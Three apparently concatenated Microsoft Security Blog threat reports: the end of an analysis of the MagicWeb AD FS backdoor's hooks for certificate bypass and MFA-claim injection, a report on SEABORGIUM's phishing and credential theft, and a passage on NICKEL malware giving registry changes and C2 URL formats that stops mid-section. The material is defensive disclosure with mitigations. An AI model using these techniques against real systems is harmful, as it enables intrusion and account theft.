MagicWeb’s BeginBuild() method is used to hook the legitimate target method Build() (from Microsoft.IdentityServer.IdentityModel.dll).

The BeginBuild() method first calls the MagicWeb’s helper method ValidateX509Extensions().

If the helper method ValidateX509Extensions() returns true, BeginBuild() returns true.

If ValidateX509Extensions() returns false, or an exception is thrown by calling ValidateX509Extensions(), BeginBuild() invokes and returns the value returned by the legitimate Build() method from Microsoft.IdentityServer.IdentityModel.dll.

This means that before the legitimate target method Build() from the legitimate Microsoft.IdentityServer.IdentityModel.dll gets an opportunity to inspect/build a certificate, MagicWeb’s hook method first inspects the certificate and returns true if the helper method ValidateX509Extensions() returns true.

This allows the attacker to subvert the normal certificate inspection/build process by introducing a custom certificate inspection/build method that’s invoked before the legitimate Build() method is invoked.

Helper Method: ValidateX509Extensions()

MagicWeb’s helper method ValidateX509Extensions() is called by BeginBuild() and other methods.

ValidateX509Extensions() returns false if the X509 certificate passed to the method is null or the Microsoft Cryptographic API certificate context handle/pointer isn’t set.

Next, the method enumerates the extensions in the X509 certificate passed to the method. If an enumerated extension is of type X509EnhancedKeyUsageExtension, the method iterates the OIDs of the extension, calculating the MD5 hash of each OID (using a custom hash computation helper method ComputeHash() that leverages the .NET MD5 class).

If the MD5 hash value of the OID matches one of the two following hardcoded MD5 values, the method returns true (this methodology is used to check if one of the two OID values below are present in the extension):

• 67F5BD28A842A1C9[REDACTED] (MD5 hash value corresponding to the OID value 1.3.6.1.4.1.311.21.8.868518.12957973.4869258.12250419.[REDACTED].[REDACTED].[REDACTED].[REDACTED])
• 6E3466296D2F63D[REDACTED] (MD5 hash value corresponding to the OID value 1.3.6.1.4.1.311.21.8.868518.12957973.4869258.12250419.[REDACTED].[REDACTED].[REDACTED].[REDACTED])

If none of the OID values are present, the method returns false.

This helper method returns true if the certificate passed to the method contains one of the two magic OID values listed above.

Hook method: BeginGetClientCertificate()

To retrieve the client’s X509 certificate, this method first calls the legitimate GetClientCertificate() method from Microsoft.IdentityServer.WebHost.dll. Next, the hook method calls the helper method ValidateX509Extensions() to determine whether the client certificate contains one of the two “magic” OID values. If the client certificate contains one of the two OID values, the hook method:

• Obtains the _adapter field from the current object
• Obtains the _request field from the _adapter object
• Sets the value of the m_ClientCertificateError field (from the _request object) to 0

This means that regardless of what the legitimate method GetClientCertificate() (from Microsoft.IdentityServer.WebHost.dll) sets the m_ClientCertificateError field to, if a client certificate contains one of the magic OID values, the hook method overwrites or sets the m_ClientCertificateError field to 0.

By using this technique, the hook method appears to be influencing the normal behavior of the application to treat or accept a non-valid client certificate as a valid certificate.

Hook method: BeginProcessClaims()

The hook method first indirectly invokes the legitimate ProcessClaims() method by invoking the ProcessClaims() method of the AuthLog class.

On line 198 in figure 16, the hook method calls MagicWeb’s helper method GetClaims(), passing in the processed identity object returned by invoking the legitimate ProcessClaims() method.

As shown above, the GetClaims() method accepts an identity object as a parameter. The method then initializes three variables named type, type2, and type3 with values obtained from the RuntimeHelper’s static field/array named types:

The types field contains the following values:

The assemblyByName2 variable above contains an assembly object representing the legitimate assembly Microsoft.IdentityServer.IdentityModel.dll (if not already loaded, the RuntimeHelper class loads the assembly into the current application domain). By calling the GetType() method, RunHelper initializes the member of the types field/array with .NET types from the Microsoft.IdentityServer.IdentityModel.dll assembly.

Returning to the GetClaims() method and the initialization of type, type2, and type3 the variables type, type2, and type3 get initialized with the following type objects from Microsoft.IdentityServer.IdentityModel.dll:

• type: Microsoft.IdentityModel.Claims.IClaimsIdentity type object
• type2: Microsoft.IdentityModel.Claims.ClaimCollection type object
• type3: Microsoft.IdentityModel.Claims.Claim type object

Next, the GetClaims() method retrieves the Claims property of the Microsoft.IdentityModel.Claims.IclaimsIdentity identity object. It also retrieves the number of claims (of type Microsoft.IdentityModel.Claims.ClaimCollection) present in the Claims property:

GetClaims() then enumerates the claims (of type Microsoft.IdentityModel.Claims.Claim), retrieving the string containing each claim and the corresponding claim type:

As shown above, the claim string and claim type string are then stored in a list named list. This list of claims and their corresponding claim types is then returned to the caller of the GetClaims() method, BeginProcessClaims().

Returning to the BeginProcessClaims() method, after retrieving the claims using the GetClaims() method, the hook method BeginProcessClaims() searches the claims list for presence of a claim with claim type of http://schemas.microsoft.com/claims/authnmethodsreferences:

As shown on line 198 above, the claim(s) of type http://schemas.microsoft.com/claims/authnmethodsreferences (if any) is stored in a list named list. If claim of type http://schemas.microsoft.com/claims/authnmethodsreferences is present and its value is set to http://schemas.microsoft.com/claims/multipleauthn, the hook method returns the IclaimsIdentity object returned by the legitimate target method ProcessClaims() (from Microsoft.IdentityServer.Service.dll) on line 191 of the hook method.

This behavior ensures that if MFA is already satisfied, then the hook method simply acts as a pass-through method and doesn’t affect the normal behavior of the claim processing pipeline.

If a claim of type http://schemas.microsoft.com/claims/authnmethodsreferences is not present or its value is not set to http://schemas.microsoft.com/claims/multipleauthn, the hook method proceeds to perform additional checks on the unprocessed claims (that is, the claims contained in the unprocessed identity object identity passed to the hook method). Once again, the hook method obtains a list of claims by calling the GetClaims() helper method. As mentioned above, instead of calling the GetClaims() helper method with the processed identity object returned by invoking the legitimate ProcessClaims() method (stored in the result variable on line 191), the hook method calls the GetClaims() helper method with the unprocessed identity object identity passed to the hook method:

On line 204, the hook method enumerates the value of each claim and uses the ComputeHash() helper method to calculate the MD5 hash value of each claim value (from the unprocessed identity object). It then checks if the MD5 value of any of the claims equals the MD5 hash value 6E3466296D2F63DE[REDACTED]. This hash value is the only element of a hardcoded hash list named oidMFAHashes (that is, this list can be expanded to include other hash values of interest):

If none of the claims have a value with MD5 hash value of 6E3466296D2F63DE[REDACTED], on line 206, the method simply returns the processed identity object returned by the legitimate target method ProcessClaims() (from Microsoft.IdentityServer.Service.dll) on line 191 of the hook method. As previously discussed, the hash value 6E3466296D2F63DE[REDACTED] corresponds to the OID value 1.3.6.1.4.1.311.21.8.868518.12957973.4869258.12250419.[REDACTED].[REDACTED].[REDACTED].[REDACTED].

Hence, the hook method enumerates the claims and if a claim with value 1.3.6.1.4.1.311.21.8.868518.12957973.4869258.12250419.[REDACTED].[REDACTED].[REDACTED].[REDACTED] isn’t present on the claim list, the hook method simply acts as a pass-through method and doesn’t affect the normal behavior of claim processing pipeline.

If by this point in the execution cycle the hook method hasn’t returned yet, it means one of the claims contains the OID value 1.3.6.1.4.1.311.21.8.868518.12957973.4869258.12250419.[REDACTED].[REDACTED].[REDACTED].[REDACTED] (otherwise, according to the logic described in the paragraph above, the hook method would’ve returned). 

Proceeding with confirmation that one of the claims contains the OID value 1.3.6.1.4.1.311.21.8.868518.12957973.4869258.12250419.[REDACTED].[REDACTED].[REDACTED].[REDACTED], the hook method proceeds to the section that represents the main purpose of MagicWeb, to perform claim injection.

Before describing the code responsible for the claim injection process, it’s important to revisit what’s already stored in the list and claims variables:

• list: As mentioned before, the hook method invokes the legitimate method ProcessClaims() to process the incoming identity object. The processed identity object (stored in result on line 191) is then passed to the GetClaims() helper method to obtain a list of claim type/value pairs extracted from the processed identity object (line 198). After obtaining the claim type/value pairs, the claim(s) of type http://schemas.microsoft.com/claims/authnmethodsreferences (if any) are stored in a list named list (line 198).

claims: As mentioned above, this variable is used to store a list of claim type/value pairs extracted from the unprocessed identity object:

With this information in mind (and the fact that one of the claims contains the OID value 1.3.6.1.4.1.311.21.8.868518.12957973.4869258.12250419.[REDACTED].[REDACTED].[REDACTED].[REDACTED]), once again here’s the first part of the claim injection code:

As shown above, if list is empty (that is, the processed identity object contained no claim type/value pairs of type http://schemas.microsoft.com/claims/authnmethodsreferences), the hook method instead turns to claims (containing the list of all claim type/value pairs extracted from the unprocessed identity object) and searches for claim type/value pairs of type http://schemas.microsoft.com/claims/authnmethodsreferences in the claims list. If the claims list contains one or more claim type/value pairs of type http://schemas.microsoft.com/claims/authnmethodsreferences, the hook method uses the claim information to add an identical claim of type http://schemas.microsoft.com/claims/authnmethodsreferences to the processed identity object (line 213 above).

Using this method, if after passing the identity object to the legitimate ProcessClaims() method, no claim of type http://schemas.microsoft.com/claims/authnmethodsreferences is returned by the legitimate method, the hook method manually adds a fraudulent claim of type http://schemas.microsoft.com/claims/authnmethodsreferences to the list of claims returned to the caller of the hooked legitimate method ProcessClaims().

As shown above, to add the fraudulent claim to the list of claims, the hook method calls a helper method named AddClaim().

Like the code in the helper method GetClaims(), AddClaims() initializes two variables with the following type objects:

• type: Microsoft.IdentityModel.Claims.IClaimsIdentity type object
• type2: Microsoft.IdentityModel.Claims.ClaimCollection type object

On line 235, AddClaims() gets the constructor for type Microsoft.IdentityModel.Claims.Claim and invokes the constructor (passing in the claim type and value from the caller of AddClaim()) to instantiate a new Claim object.

The legitimate internal constructor from Microsoft.IdentityModel.Claims.Claim, retrieved and invoked by AddClaim(), invokes the internal constructor Claim (overloaded method) with the following method parameters:

After instantiating a new Claim object, AddClaim() uses the Add() method from type Microsoft.IdentityModel.Claims.ClaimCollection to add the new claim to the identity object passed to AddClaim() by its caller (in this case, the new claim is added to the identity object containing the list of claims returned by the call to the legitimate method ProcessClaims()).

Revisiting the claim injection code in the hook method BeginProcessClaims() (and recalling the fact that one of the claims contains the OID value 1.3.6.1.4.1.311.21.8.868518.12957973.4869258.12250419.[REDACTED].[REDACTED].[REDACTED].[REDACTED]), here’s the second part of the claim injection code:

Recall that list contains claim type/value pairs of type http://schemas.microsoft.com/claims/authnmethodsreferences extracted from the processed identity object. If none of the claims in list have the value http://schemas.microsoft.com/claims/multipleauthn, the hook method proceeds to call AddClaim() to add a fraudulent claim of type http://schemas.microsoft.com/claims/authnmethodsreferences and value http://schemas.microsoft.com/claims/multipleauthn to the list of claims returned to the caller of the hooked legitimate method ProcessClaims().

Using the fraudulent claim injection techniques described above, if a claim with the Magic OID value 1.3.6.1.4.1.311.21.8.868518.12957973.4869258.12250419.[REDACTED].[REDACTED].[REDACTED].[REDACTED] is presented to AD FS, regardless of how the legitimate hooked method ProcessClaims() handles the claim, the BeginProcessClaims() hook function ensures that a claim with value http://schemas.microsoft.com/claims/multipleauthn is returned to the caller of the legitimate hooked method ProcessClaims().

Hook method: BeginEndpointConfiguration()

The backdoor BeginEndpointConfiguration() method, used to hook the legitimate target method EndpointConfiguration() (from Microsoft.IdentityServer.WebHost.dll) is shown below:

The enumType variable is initialized with RuntimeHelper.types[0] which is a Microsoft.IdentityServer.WebHost.Proxy.CertificateValidation type object. The PropertyInfo variables propertyInfo, propertyInfo2, and propertyInfo3 are initialized with property objects retrieved from ‘properties’ field/array of RuntimeHelper:

• propertyInfo: CertificateValidation property from type Microsoft.IdentityServer.WebHost.Proxy.ProxyEndpoint of Microsoft.IdentityServer.WebHost.dll
• propertyInfo2: Path property from type Microsoft.IdentityServer.WebHost.Proxy.ProxyEndpoint of Microsoft.IdentityServer.WebHost.dll
• propertyInfo3: Endpoints property from type Microsoft.IdentityServer.WebHost.Proxy.ProxyEndpointConfiguration of Microsoft.IdentityServer.WebHost.dll

Next, the hook method retrieves the value of the Endpoint property of the value object that the legitimate EndpointConfiguration() method was called with. The Endpoint property holds a collection of ProxyEndpoint objects. The hook method enumerates the ProxyEndpoint objects and for each object, it checks if the value of the CertificateValidation enum is set to ‘1’ which signifies ‘SSL’. If the CertificateValidation enum for a ProxyEndpoint object is set to ‘1’/’SSL’, on line 165, the hook method overwrites the value of the CertificateValidation enum with ‘0’ which signifies ‘None’. To ensure the change is reflected, the hook method then overwrites the Endpoint property of the value object with the updated Endpoint property containing the overwritten CertificateValidation enum values (that is, ‘SSL’ overwritten with ‘None’).

Behaving as a true hook method, on line 179, the method calls the legitimate EndpointConfiguration() method but with the modified ‘value’ object. Hence, when the legitimate EndpointConfiguration() method is invoked during the normal operation of AD FS, this hook method intercepts the call and, before passing the object to the legitimate EndpointConfiguration() method was invoked with, it overwrites the CertificateValidation value of each ProxyEndpoint object and only then it calls the legitimate EndpointConfiguration() method but now with modified CertificateValidation value(s), changed from ‘SSL’ to ‘None’.

The purpose of overwriting CertificationValidation value to ‘None’ (wherever it’s ‘SSL’) is to allow WAP to pass the request with the specific malicious certificate to AD FS for further authentication processing. According to Microsoft.IdentityServer.ProxyService/TLSClientReqeustHandler, WAP stops sending the current request from client to AD FS if CertificateValidation is ‘1’ (‘SSL’) and the client certificate has an error during validation.

References

• “I am AD FS and so can you: Attacking Active Directory Federated Services”, Austin Baker and Douglas Bienstock, Troopers 2019
• Understanding Key Active Directory Federation Services Concepts, Microsoft documentation

The post MagicWeb: NOBELIUM’s post-compromise trick to authenticate as anyone appeared first on Microsoft Security Blog.

April 2023 update – Microsoft Threat Intelligence has shifted to a new threat actor naming taxonomy aligned around the theme of weather. SEABORGIUM is now tracked as Star Blizzard and ACTINIUM is now tracked as Aqua Blizzard.

To learn about how the new taxonomy represents the origin, unique traits, and impact of threat actors, and to get a complete mapping of threat actor names, read this blog: Microsoft shifts to a new threat actor naming taxonomy.

The Microsoft Threat Intelligence Center (MSTIC) has observed and taken actions to disrupt campaigns launched by SEABORGIUM, an actor Microsoft has tracked since 2017. SEABORGIUM is a threat actor that originates from Russia, with objectives and victimology that align closely with Russian state interests. Its campaigns involve persistent phishing and credential theft campaigns leading to intrusions and data theft. SEABORGIUM intrusions have also been linked to hack-and-leak campaigns, where stolen and leaked data is used to shape narratives in targeted countries. While we cannot rule out that supporting elements of the group may have current or prior affiliations with criminal or other nonstate ecosystems, MSTIC assesses that information collected during SEABORGIUM intrusions likely supports traditional espionage objectives and information operations as opposed to financial motivations.

This blog provides insights into SEABORGIUM’s activities and technical methods, with the goal of sharing context and raising awareness about a significant threat to Microsoft customers. MSTIC would like to acknowledge the Google Threat Analysis Group (TAG) and the Proofpoint Threat Research Team for their collaboration on tracking and disrupting this actor. Microsoft’s ability to detect and track SEABORGIUM’s abuse of Microsoft services, particularly OneDrive, has provided MSTIC sustained visibility into the actor’s activities and enabled us to notify impacted customers. As an outcome of these service abuse investigations, MSTIC partnered with abuse teams in Microsoft to disable accounts used by the actor for reconnaissance, phishing, and email collection. Microsoft Defender SmartScreen has also implemented detections against the phishing domains represented in SEABORGIUM’s activities.

Who is SEABORGIUM?

SEABORGIUM is a highly persistent threat actor, frequently targeting the same organizations over long periods of time. Once successful, it slowly infiltrates targeted organizations’ social networks through constant impersonation, rapport building, and phishing to deepen their intrusion. SEABORGIUM has successfully compromised organizations and people of interest in consistent campaigns for several years, rarely changing methodologies or tactics. Based on known indicators of compromise and actor tactics, SEABORGIUM overlaps with the threat groups tracked as Callisto Group (F-Secure), TA446 (Proofpoint) and COLDRIVER (Google). Security Service of Ukraine (SSU) has associated Callisto with Gamaredon Group (tracked by Microsoft as ACTINIUM); however, MSTIC has not observed technical intrusion links to support the association. 

Since the beginning of 2022, Microsoft has observed SEABORGIUM campaigns targeting over 30 organizations, in addition to personal accounts of people of interest. SEABORGIUM primarily targets NATO countries, particularly the US and the UK, with occasional targeting of other countries in the Baltics, the Nordics, and Eastern Europe. Such targeting has included the government sector of Ukraine in the months leading up to the invasion by Russia, and organizations involved in supporting roles for the war in Ukraine. Despite some targeting of these organizations, Microsoft assesses that Ukraine is likely not a primary focus for this actor; however, it is most likely a reactive focus area for the actor and one of many diverse targets.

Within the target countries, SEABORGIUM primarily focuses operations on defense and intelligence consulting companies, non-governmental organizations (NGOs) and intergovernmental organizations (IGOs), think tanks, and higher education. SEABORGIUM has a high interest in targeting individuals as well, with 30% of Microsoft’s nation-state notifications related to SEABORGIUM activity being delivered to Microsoft consumer email accounts. SEABORGIUM has been observed targeting former intelligence officials, experts in Russian affairs, and Russian citizens abroad. As with any observed nation-state actor activity, Microsoft directly notifies customers of Microsoft services that have been targeted or compromised, providing them with the information they need to secure their accounts.

Observed actor activity

Over many years of tracking, Microsoft has observed a consistent methodology from SEABORGIUM with only slight deviations in their social engineering approaches and in how they deliver the initial malicious URL to their targets. In this section, we provide detailed analysis of SEABORBIUM’s operational tactics as well as several examples of their campaigns.

Impersonation and establishing contact

Before starting a campaign, SEABORGIUM often conducts reconnaissance of target individuals, with a focus on identifying legitimate contacts in the targets’ distant social network or sphere of influence. Based on some of the impersonation and targeting observed, we suspect that the threat actor uses social media platforms, personal directories, and general open-source intelligence (OSINT) to supplement their reconnaissance efforts. MSTIC, in partnership with LinkedIn, has observed fraudulent profiles attributed to SEABORGIUM being used sporadically for conducting reconnaissance of employees from specific organizations of interest. In accordance with their policies, LinkedIn terminated any account (including the one shown below) identified as conducting inauthentic or fraudulent behavior.

SEABORGIUM also registers new email accounts at various consumer email providers, with the email address or alias configured to match legitimate aliases or names of impersonated individuals. While the creation of new consumer accounts is common, we have also observed SEABORGIUM returning to and reusing historical accounts that match the industry of the ultimate target. In one case, we observed SEABORGIUM returning to an account it had not used in a year, indicating potential tracking and reusing of accounts if relevant to targets’ verticals.

After registering new accounts, SEABORGIUM proceeds to establish contact with their target. In cases of personal or consumer targeting, MSTIC has mostly observed the actor starting the conversation with a benign email message, typically exchanging pleasantries before referencing a non-existent attachment while highlighting a topic of interest to the target. It’s likely that this additional step helps the actor establish rapport and avoid suspicion, resulting in further interaction. If the target replies, SEABORGIUM proceeds to send a weaponized email.

MSTIC has also documented several cases where the actor focuses on a more organizational approach to phishing. In these cases, the actor uses an authoritative approach in their social engineering and typically goes to directly sending malicious content.

These examples serve to demonstrate the actors’ capability to be dynamic and to adapt their social engineering approach to gain the trust of their victims.

Delivery of malicious content

Microsoft has identified several variations in the way that SEABORGIUM delivers a link that directs targets to their credential stealing infrastructure. 

URL in body of email

In the simplest case, SEABORGIUM directly adds a URL to the body of their phishing email. Occasionally, the actor leverages URL shorteners and open redirects to obfuscate their URL from the target and inline protection platforms. The email varies between fake personal correspondence with a hyperlinked text and fake file sharing emails that imitate a range of platforms.

PDF file attachment that contains a URL

MSTIC has observed an increase in the use of attachments in SEABORGIUM campaigns. These attachments typically imitate a file or document hosting service, including OneDrive, and request the user to open the document by clicking a button.

OneDrive link to PDF file that contains a URL

SEABORGIUM also abuses OneDrive to host PDF files that contain a link to the malicious URL. This activity does not represent any security issues or vulnerabilities on the OneDrive platform. The actors include a OneDrive link in the body of the email that when clicked directs the user to a PDF file hosted within a SEABORGIUM-controlled OneDrive account. As seen in the previous example, the victim is presented with what appears to be a failed preview message, enticing the target to click the link to be directed to the credential-stealing infrastructure. Occasionally, SEABORGIUM makes use of open redirects within the PDF file to further disguise their operational infrastructure. In the example below, SEABORGIUM uses a Google URL for redirection.

Credential theft

Regardless of the method of delivery, when the target clicks the URL, the target is directed to an actor-controlled server hosting a phishing framework, most often EvilGinx. On occasion, Microsoft has observed attempts by the actor to evade automated browsing and detonation by fingerprinting browsing behavior. Once the target is redirected to the final page, the framework prompts the target for authentication, mirroring the sign-in page for a legitimate provider and intercepting any credentials. After credentials are captured, the target is redirected to a website or document to complete the interaction.  

Data exfiltration and impact

SEABORGIUM has been observed to use stolen credentials and directly sign in to victim email accounts. Based on our experience responding to intrusions from this actor on behalf of our customers, we have confirmed that the following activities are common:

• Exfiltration of intelligence data: SEABORGIUM has been observed exfiltrating emails and attachments from the inbox of victims.
• Setup of persistent data collection: In limited cases, SEABORGIUM has been observed setting up forwarding rules from victim inboxes to actor-controlled dead drop accounts where the actor has long-term access to collected data. On more than one occasion, we have observed that the actors were able to access mailing-list data for sensitive groups, such as those frequented by former intelligence officials, and maintain a collection of information from the mailing-list for follow-on targeting and exfiltration.
• Access to people of interest: There have been several cases where SEABORGIUM has been observed using their impersonation accounts to facilitate dialog with specific people of interest and, as a result, were included in conversations, sometimes unwittingly, involving multiple parties. The nature of the conversations identified during investigations by Microsoft demonstrates potentially sensitive information being shared that could provide intelligence value.

Based on the specific victimology, documents stolen, conversations fostered, and sustained collection observed, we assess that espionage is likely a key motivation of the actor.

Sporadic involvement with information operations

In May 2021, MSTIC attributed an information operation to SEABORGIUM based on observations and technical overlaps with known phishing campaigns. The operation involved documents allegedly stolen from a political organization in the UK that were uploaded to a public PDF file-sharing site. The documents were later amplified on social media via known SEABORGIUM accounts, however MSTIC observed minimal engagement or further amplification. Microsoft was unable to validate the authenticity of the material.  

In late May 2022, Reuters along with Google TAG disclosed details about an information operation, specifically using hack and leak, that they attributed to COLDRIVER/SEABORGIUM. Microsoft independently linked SEABORGIUM to the campaign through technical indicators and agrees with the assessment by TAG on the actor responsible for the operation. In the said operation, the actors leaked emails/documents from 2018 to 2022, allegedly stolen from consumer Protonmail accounts belonging to high-level proponents of Brexit, to build a narrative that the participants were planning a coup. The narrative was amplified using social media and through specific politically themed media sources that garnered quite a bit of reach.

While we have only observed two cases of direct involvement, MSTIC is not able to rule out that SEABORGIUM’s intrusion operations have yielded data used through other information outlets. As with any information operation, Microsoft urges caution in distributing or amplifying direct narratives, and urges readers to be critical that the malicious actors could have intentionally inserted misinformation or disinformation to assist their narrative. With this in mind, Microsoft will not be releasing the specific domain or content to avoid amplification.  

Recommended customer actions

The techniques used by the actor and described in the “Observed actor activity” section can be mitigated by adopting the security considerations provided below:

• Check your Office 365 email filtering settings to ensure you block spoofed emails, spam, and emails with malware.
• Configure Office 365 to disable email auto-forwarding.
• Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.
• Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single factor authentication, to confirm authenticity and investigate any anomalous activity.
• Require multifactor authentication (MFA) for all users coming from all locations including perceived trusted environments, and all internet-facing infrastructure–even those coming from on-premises systems.
• Leverage more secure implementations such as FIDO Tokens, or Microsoft Authenticator with number matching. Avoid telephony-based MFA methods to avoid risks associated with SIM-jacking.

For Microsoft Defender for Office 365 Customers:

• Use Microsoft Defender for Office 365 for enhanced phishing protection and coverage against new threats and polymorphic variants.
• Enable Zero-hour auto purge (ZAP) in Office 365 to quarantine sent mail in response to newly acquired threat intelligence and retroactively neutralize malicious phishing, spam, or malware messages that have already been delivered to mailboxes.
• Configure Defender for Office 365 to recheck links on click. Safe Links provides URL scanning and rewriting of inbound email messages in mail flow, and time-of-click verification of URLs and links in email messages, other Office applications such as Teams, and other locations such as SharePoint Online. Safe Links scanning occurs in addition to the regular anti-spam and anti-malware protection in inbound email messages in Exchange Online Protection (EOP). Safe Links scanning can help protect your organization from malicious links that are used in phishing and other attacks.
• Use the Attack Simulator in Microsoft Defender for Office 365 to run realistic, yet safe, simulated phishing and password attack campaigns within your organization. Run spear-phishing (credential harvest) simulations to train end-users against clicking URLs in unsolicited messages and disclosing their credentials.

Indicators of compromise (IOCs)

The below list provides IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.

NOTE: These indicators should not be considered exhaustive for this observed activity.

Detections

Intelligence gathered by the Microsoft Threat Intelligence Center (MSTIC) is used within Microsoft security products to provide protection against associated actor activity.

Microsoft Defender for Office 365

Microsoft Defender for Office offers enhanced solutions for blocking and identifying malicious emails. Signals from Microsoft Defender for Office inform Microsoft 365 Defender, which correlate cross-domain threat intelligence to deliver coordinated defense, when this threat has been detected. These alerts, however, can be triggered by unrelated threat activity. Example alerts:

• A potentially malicious URL click was detected
• Email messages containing malicious URL removed after delivery
• Email messages removed after delivery
• Email reported by user as malware or phish

Microsoft 365 Defender

Aside from the Microsoft Defender for Office 365 alerts above, customers can also monitor for the following Microsoft 365 Defender alerts for this attack. Note that these alerts can also be triggered by unrelated threat activity. Example alerts:

• Suspicious URL clicked
• Suspicious URL opened in web browser
• User accessed link in ZAP-quarantined email

Microsoft 365 Defender customers should also investigate any “Stolen session cookie was used” alerts that would betriggered for adversary-in-the-middle (AiTM) attacks.

Microsoft Defender SmartScreen

Microsoft Defender SmartScreen has implemented detections against the phishing domains represented in the IOC section above.

Advanced hunting queries

Microsoft Sentinel

Microsoft Sentinel customers can run the following advanced hunting queries to locate IOCs and related malicious activity in their environments.

The query below identifies matches based on domain IOCs related to SEABORGIUM actor across a range of common Microsoft Sentinel data sets:

https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/SEABORGIUMDomainsAugust2022.yaml

Microsoft 365 Defender

Microsoft 365 Defender customers can run the following advanced hunting queries to locate IOCs and related malicious activity in their environments.

This query identifies matches based on domain IOCs related to SEABORGIUM against Microsoft Defender for Endpoint device network connections

https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/SEABORGIUMDomainIOCsAug2022.yaml

The post Disrupting SEABORGIUM’s ongoing phishing operations appeared first on Microsoft Security Blog.

MSTIC has tracked the current NICKEL operations, including attacks against government organizations, diplomatic entities, and NGOs, since September 2019. During this time, NICKEL activity has been observed across several countries, with a large amount of activity targeting Central and South American governments. Notably, NICKEL has achieved long-term access to several targets, allowing NICKEL to conduct activities such as regularly scheduled exfiltration of data. As China’s influence around the world continues to grow and the nation establishes bilateral relations with more countries and extends partnerships in support of China’s Belt and Road Initiative, we assess that China-based threat actors will continue to target customers in government, diplomatic, and NGO sectors to gain new insights, likely in pursuit of economic espionage or traditional intelligence collection objectives. Portions of the NICKEL activity we are highlighting have also been blogged about by our colleagues at ESET.

Figure 1: NICKEL targeted countries: Argentina, Barbados, Bosnia and Herzegovina, Brazil, Bulgaria, Chile, Colombia, Croatia, Czech Republic, Dominican Republic, Ecuador, El Salvador, France, Guatemala, Honduras, Hungary, Italy, Jamaica, Mali, Mexico, Montenegro, Panama, Peru, Portugal, Switzerland, Trinidad and Tobago, United Kingdom, United States of America, Venezuela

As with any observed nation-state actor activity, Microsoft continues to notify customers that have been targeted or compromised, providing them with the information they need to help secure their organizations. To reduce the potential impact of this NICKEL activity, Microsoft encourages our customers to immediately review the activity and guidance below, then implement risk mitigations, harden environments, and investigate suspicious behaviors that match the tactics described in this blog. MSTIC will continue to observe, monitor, and notify affected customers and partners, when possible, through our nation-state notification process.

Observed activity

MSTIC has observed NICKEL actors using exploits against unpatched systems to compromise remote access services and appliances. Upon successful intrusion, they have used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts. NICKEL actors created and deployed custom malware that allowed them to maintain persistence on victim networks over extended periods of time. MSTIC has also observed NICKEL perform frequent and scheduled data collection and exfiltration from victim networks.

NICKEL successfully compromises networks using attacks on internet-facing web applications running on unpatched Microsoft Exchange and SharePoint. They also attack remote access infrastructure, such as unpatched VPN appliances, as referenced in the FireEye April 2021 blog detailing a 0-day vulnerability in Pulse Secure VPN that has since been patched.

After gaining an initial foothold on a compromised system, the NICKEL actors routinely performed reconnaissance on the network, working to gain access to additional accounts or higher-value systems. NICKEL typically deployed a keylogger to capture credentials from users on compromised systems. We’ve observed NICKEL using Mimikatz, WDigest (an older authentication method that allows the attacker access to credentials in clear text), NTDSDump, and other password dumping tools to gather credentials on a targeted system and from target browsers.

Deploying malware for command and control
MSTIC tracks multiple malware families used by NICKEL for command and control as Neoichor, Leeson, NumbIdea, NullItch, and Rokum.

The Leeson, Neoichor, and NumbIdea malware families typically use the Internet Explorer (IE) COM interface to connect and receive commands from hardcoded C2 servers. Due to their reliance on IE, these malware families intentionally configure the browser settings by modifying the following registry entries:

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
Start Page = “about:blank”
DisableFirstRunCustomize = 1
RunOnceComplete = 1
RunOnceHasShown = 1
Check_Associations = 1

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery]
AutoRecover = 0

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Privacy]
ClearBrowsingHistoryOnExit = 1

[HKEY_CURRENT_USER\Software\Microsoft\Internet Connection Wizard]
Completed = 1

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
IEHarden = 0

When connecting to the C2 servers, the URL requests follow these formats:

http[:]//<C2>?id=<5-digit-rand><system-specific-string>
http[:]//<C2>?setssion==<rand><GetTickCount>
http[:]//<C2>?newfrs%dsetssion=<rand><GetTickCount>
http[:]//<C2>/index.htm?content=<base64-system-specifc-string>&id=<num>

A typical response from the C2 server is a legitimate-looking webpage containing the string “!DOCTYPE html”, which the malware checks. The malware then locates a Base64-encoded blob, which it decodes and proceeds to load as a shellcode.

For the Neoichor family, the malware checks for internet connectivity by contacting bing.com with the request format bing.com?id=<GetTickCount> and drops files as ~atemp and ~btemp containing error codes and debug resources.

The NICKEL implants are backdoors capable of collecting system information, such as:

• IP address
• OS version
• System language ID
• Computer name
• Signed-in username

They implement basic backdoor functionalities, including:

• Launching a process
• Uploading a file
• Downloading a file
• Executing a shellcode in memory

MSTIC has observed NICKEL drop their malware into existing installed software paths. They did this to make their malware appear to be files used for an installed application. The following are example paths:

• C:\Program Files\Realtek\Audio\HDA\AERTSr.exe
• C:\Program Files (x86)\Foxit Software\Foxit Reader\FoxitRdr64.exe
• C:\Program Files (x86)\Adobe\Flash Player\AddIns\airappinstaller\airappinstall.exe
• C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd64.exe

Using compromised credentials for routine email collection

NICKEL used compromised credentials to sign into victims’ Microsoft 365 accounts through normal sign-ins with a browser and the legacy Exchange Web Services (EWS) protocol to review and collect victim emails. MSTIC has observed successful NICKEL sign-ins to compromised accounts through commercial VPN providers as well as from actor-controlled infrastructure. The activity graphed below shows NICKEL sign-in activity happening most frequently on Monday through Friday from 12:00 AM UTC (8:00 AM China Standard time) through 09:00 AM UTC (5:00 PM China Standard Time). There are also possible indications of a shift-based scheduling model based on the observed limited set of activity during a typical weekend.

Figure 2: Heatmap of observed NICKEL login activity by day of week and hour (UTC time)

Evidence of routine host data collection

In several observed cases, NICKEL was seen performing regular data collection for exfiltration purposes. Their activity included looking in directories of interest for new files added since the last time they collected data. In the example below, NICKEL was collecting data that had been created or modified multiple times over a one-month period. For instance, on October 22, NICKEL looked for files that had been created since October 19 in multiple folders. Previously, on October 20 they had done the same thing looking for files that were modified or created since October 13.

